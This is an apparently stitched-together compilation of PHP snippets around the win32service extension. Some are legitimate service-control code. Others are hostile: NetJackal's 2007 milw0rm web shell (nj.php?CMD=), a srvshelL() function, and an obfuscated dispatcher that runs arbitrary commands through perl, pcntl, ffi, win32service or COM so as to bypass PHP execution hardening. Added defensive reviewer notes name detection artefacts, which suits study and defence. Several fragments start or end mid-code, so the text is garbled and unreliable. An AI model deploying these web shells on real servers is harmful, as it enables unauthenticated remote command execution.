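/**
 * Start the Windows service named by $this->serviceName.
 *
 * Result handling depends on the win32service extension version:
 * before 1.0.0, win32_start_service() returns WIN32_NO_ERROR (0) on success
 * and false or a non-zero Win32 error code on failure; from 1.0.0 on it
 * returns nothing and throws on failure. Both conventions are accepted here.
 *
 * @return bool true once the start request was accepted
 * @throws \Exception when the start request is rejected
 */
public function start()
{
    $result = win32_start_service($this->serviceName);

    // A plain truthiness test reads the legacy return value backwards:
    // success is 0 (falsy) and every error code is non-zero (truthy).
    // null covers the 1.0.0+ API, which signals failure by throwing instead.
    if ($result === WIN32_NO_ERROR || $result === null) {
        error_log($this->serviceDisplayName . " Status: Started");
        return true;
    }

    // The original message said "Stopping" although this is the start path.
    throw new \Exception(
        "Error Starting Service: " . $this->serviceDisplayName
        . " (result " . var_export($result, true) . ")"
    );
}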
/**
 * Runs $command through the Windows command interpreter by registering a
 * short-lived service, then returns what the command wrote to a temp file.
 *
 * Reviewer notes (defensive):
 * - The service's binary path is cmd.exe (or %ComSpec%), not a service
 *   executable. The command line is passed as the service parameters with
 *   stdout redirected to a file. No PHP process-execution function is called.
 * - $command is interpolated into the parameter string with no quoting or
 *   validation, so the caller fully controls what the interpreter runs.
 * - No return value of the win32_* calls is checked.
 * - Observable artefacts: a service whose name and display name are "NJ"
 *   followed by a uniqid() value, created and deleted within moments; a file
 *   with the same naming scheme in the directory returned by whereistmP().
 *   Service installation is recorded by Windows (System log event 7045,
 *   Security log event 4697 when audited), and a binary path pointing at
 *   cmd.exe is a strong signal on its own.
 * - Hardening: do not load the win32service extension in a web-facing PHP,
 *   and run the PHP/web server account without rights to create services.
 *
 * @param string $command command line handed to "cmd /c"
 * @return string|false contents of the output file, as returned by file_get_contents()
 */
function srvshelL($command)
{
    // Output file path. whereistmP() is defined elsewhere; presumably it
    // returns a writable temp directory — confirm against its definition.
    $name = whereistmP() . "\\" . uniqid('NJ');
    // Random service name, also used as the display name.
    $n = uniqid('NJ');
    // Interpreter path: %ComSpec% when set, else a hard-coded D: drive path.
    $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
    // Register the interpreter as a service; params carry the command and the
    // redirect into $name.
    win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
    // Start, then immediately stop and delete, so the service exists only briefly.
    win32_start_service($n);
    win32_stop_service($n);
    win32_delete_service($n);
    // Polls once per second until the output file exists. There is no
    // timeout, so the request blocks indefinitely if the file never appears.
    while (!file_exists($name)) {
        sleep(1);
    }
    $exec = file_get_contents($name);
    // Removes the output file after reading it.
    unlink($name);
    return $exec;
}
$result = win32_query_service_status($OOService); if (is_array($result)) { $iProcessId = $result['ProcessId']; if (!empty($iProcessId) && $iProcessId != 0) { // If there is a process id (PID) then open office is running so we exit if ($sGiveOutput) { echo 1; } exit; } } } // Service is not running - log it and attempt to start $default->log->error('Check Open Office Task: Open office service is not running... trying to start it.'); // Use the win32 service start $result2 = win32_start_service($OOService); if ($result2 == 0) { // Service started successfully $default->log->debug('Check Open Office Task: Open office service started.'); if ($sGiveOutput) { echo 1; } exit; } $default->log->error('Check Open Office Task: Open office service could not be started. Error code ' . $result2); // Attempt using the dmsctl batch script $sPath = realpath('../../bin/dmsctl.bat'); if (file_exists($sPath)) { $sCmd = "\"{$sPath}\" start"; $default->log->debug('Check Open Office Task: ' . get_current_user()); $default->log->debug('Check Open Office Task: ' . $sCmd);
/**
 * Request a start of the service $this->name on $this->machine.
 *
 * The raw result of win32_start_service() is stored in $this->last_error so
 * callers can inspect it afterwards.
 *
 * NOTE(review): this relies on the pre-1.0.0 win32service return convention
 * (WIN32_NO_ERROR on success, error code otherwise). On 1.0.0+ the function
 * returns nothing and throws on failure, so last_error would be null and this
 * method would report false after a successful start — confirm the extension
 * version in use.
 *
 * @return bool true when the result is WIN32_NO_ERROR or
 *              WIN32_ERROR_SERVICE_ALREADY_RUNNING, false otherwise
 */
function start()
{
    $this->last_error = win32_start_service($this->name, $this->machine);

    // A clean start counts as success.
    if ($this->last_error === WIN32_NO_ERROR) {
        return true;
    }

    // A service that was already running is also treated as success.
    return $this->last_error === WIN32_ERROR_SERVICE_ALREADY_RUNNING;
}
} } } } } exit(0); case 'install': win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL)); KalturaLog::info('Service Installed'); exit(0); case 'uninstall': win32_delete_service($serviceName); KalturaLog::info('Service Removed'); exit(0); case 'start': win32_start_service($serviceName); KalturaLog::info('Service Started'); exit(0); case 'stop': win32_stop_service($serviceName); KalturaLog::info('Service Stopped'); exit(0); case 'run': win32_start_service_ctrl_dispatcher($serviceName); win32_set_service_status(WIN32_SERVICE_RUNNING); break; case 'debug': set_time_limit(10); break; default: KalturaLog::info('Unkown action');
# Note: Tested on 5.2.1
# Author: NetJackal
# Email: nima_501[at]yahoo[dot]com
# Website: http://netjackal.by.ru
# Usage: http://victim.net/nj.php?CMD=[command]
#
# Reviewer notes (defensive):
# - The script takes a command line from the CMD query parameter, with no
#   authentication or validation, and runs it through the Windows command
#   interpreter. It does so by registering the interpreter as a temporary
#   service, not by calling any PHP process-execution function.
# - Output is redirected to a file in upload_tmp_dir, read back, HTML-escaped
#   and printed.
# - Observable artefacts: a service named "NJ" + uniqid() created and deleted
#   within the same request, with cmd.exe as its binary path; a file with the
#   same naming scheme in the upload temp directory; requests carrying a CMD
#   parameter. Service installation is logged by Windows (System log event
#   7045, Security log event 4697 when audited).
# - Hardening: do not load the win32service extension in a web-facing PHP,
#   and run the web server account without rights to create services.

$command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir'; # command; defaults to 'dir' when the parameter is absent
$dir = ini_get('upload_tmp_dir'); # Directory to store command's output
# Stops early when the extension this technique depends on is not loaded.
if (!extension_loaded('win32service')) {
    die('win32service extension not found!');
}
# Output file and service name both use the "NJ" + uniqid() scheme.
$name = $dir . "\\" . uniqid('NJ');
$n = uniqid('NJ');
# Interpreter path: %ComSpec% when set, else a hard-coded D: drive path.
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
# The request-supplied command is interpolated unquoted into the service
# parameters, with stdout redirected to $name.
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
# Create, start, stop and delete happen back to back; no result is checked.
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
# The file is read straight away, without waiting for it to appear.
$exec = file_get_contents($name);
unlink($name);
# Output is HTML-escaped before being echoed to the requester.
echo "<pre>" . htmlspecialchars($exec) . "</pre>";
?> # milw0rm.com [2007-07-27]
case '重启': win32_restart_service($service->item(0)->getElementsByTagName("mysql")->item(0)->nodeValue); echo '<SCRIPT>alert("MySQL重启命令执行完成")</SCRIPT>'; break; default: break; } switch ($_POST['filezilla']) { case '启动': win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla启动命令执行完成")</SCRIPT>'; break; case '停止': win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla停止命令执行完成")</SCRIPT>'; break; case '重启': win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); sleep(5); win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla重启命令执行完成")</SCRIPT>'; break; default: break; } } else { echo '<hr/>您的服务器没有为PHP安装<b>win32service</b>扩展库,请前往PHP官方站点<a href="http://pecl.php.net/package/win32service">下载安装</a>至php的ext目录当中,并注意要在php.ini中添加<b>extension=php_win32service.dll;</b>语句,最后重新启动nginx生效!<u>注意:请核对好PHP版本</u>'; } ?> </center></body> </html>
/**
 * Command-execution dispatcher with obfuscated identifiers: runs $c through
 * whichever optional PHP extension is loaded and returns the captured output.
 *
 * Reviewer notes (defensive):
 * - No branch uses PHP's ordinary process functions. Execution goes through
 *   the perl, pcntl, ffi, win32service and win32std extensions, or through
 *   COM (WScript.Shell). A hardening policy that only restricts the ordinary
 *   process functions therefore does not cover these paths. Web-facing PHP
 *   should not load these extensions unless the application needs them.
 * - $win and $tempdir are globals set elsewhere. The helpers z7r(), z9p()
 *   and z6l() are not visible here: z7r() presumably tests whether a
 *   function is usable, z9p() presumably returns a file's contents, and
 *   z6l() is applied to the command before concatenation (purpose unknown)
 *   — confirm against their definitions.
 * - Observable artefacts: files named "pcntl" + uniqid() or "NJ" + uniqid()
 *   under $tempdir; on Windows, short-lived services named "NJ" + uniqid()
 *   whose binary is cmd.exe, and cmd.exe processes spawned by the PHP or
 *   web server process with output redirected to such a file. Most calls
 *   are prefixed with @, so failures leave nothing in PHP's error log.
 *
 * @param string $c command line to run
 * @return mixed captured output or a status string; '' when $c is empty
 */
function z6v($c)
{
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            // Non-Windows host.
            if (extension_loaded('perl')) {
                // Embedded Perl interpreter: $c is placed inside a Perl
                // system('...') call, and its output is captured with PHP
                // output buffering.
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                // Fork, then replace the child with a perl binary that runs
                // $c with stdout redirected to $o.
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    // Parent process: appends a status line.
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    // Child process: tries two fixed perl locations.
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                // Overwrites the status text with the output file's contents,
                // then removes the file.
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            // Windows host: every branch redirects cmd.exe output into $o.
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                // Legacy ffi extension: binds WinExec from kernel32.dll.
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                // Polls for the output file, with no timeout.
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                // Registers cmd.exe as a temporary service, starts it, then
                // stops and deletes it immediately.
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                // win32std shell execute, using a relative path to cmd.exe.
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                // Fallback: COM automation through WScript.Shell. This branch
                // reads the file without polling for it first.
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            // The output file is removed after every Windows branch.
            @unlink($o);
        }
    }
    return $r;
}